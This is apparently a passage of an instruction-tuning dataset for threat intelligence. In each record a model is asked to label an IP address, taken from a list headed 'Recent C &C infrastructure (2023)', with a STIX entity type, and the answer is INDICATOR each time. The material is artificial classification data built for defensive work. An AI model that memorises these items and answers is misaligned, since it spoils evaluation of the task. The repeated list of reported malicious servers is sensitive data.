178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n45.32.101.6\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n178.128.228.252\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n206.189.14.94\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n45.32.62.100\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n146.190.60.230\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 